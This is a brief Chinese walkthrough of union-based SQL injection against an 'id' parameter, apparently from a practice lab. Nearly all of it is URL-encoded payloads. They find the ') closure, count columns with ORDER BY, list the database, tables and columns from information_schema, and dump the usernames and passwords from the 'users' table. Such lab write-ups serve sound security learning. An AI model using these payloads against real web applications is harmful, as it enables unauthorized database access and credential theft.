输入单引号试探： id=1 '

报错信息里面出现 ') 说明闭合符合里面还有个 )

再次试探：id=1 ') order by 3 --+

查看回显位置：

id=-1%20%27)%20union%20select%201,2,3%20--+

查看数据库：

id=-1%20%27)%20union%20select%201,2,database()%20--+

查看表：

id=-1%20%27)%20union%20select%201,2,group_concat(table_name) from information_schema.tables where table_schema=database()%20--+

查看列名：

?id=-1%20%27)%20union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%20--+

查看字段内容：

id=-1%20%27)%20union%20select%201,2,group_concat(0x7e,username,0x5c,password,0x7e)%20from users%20--+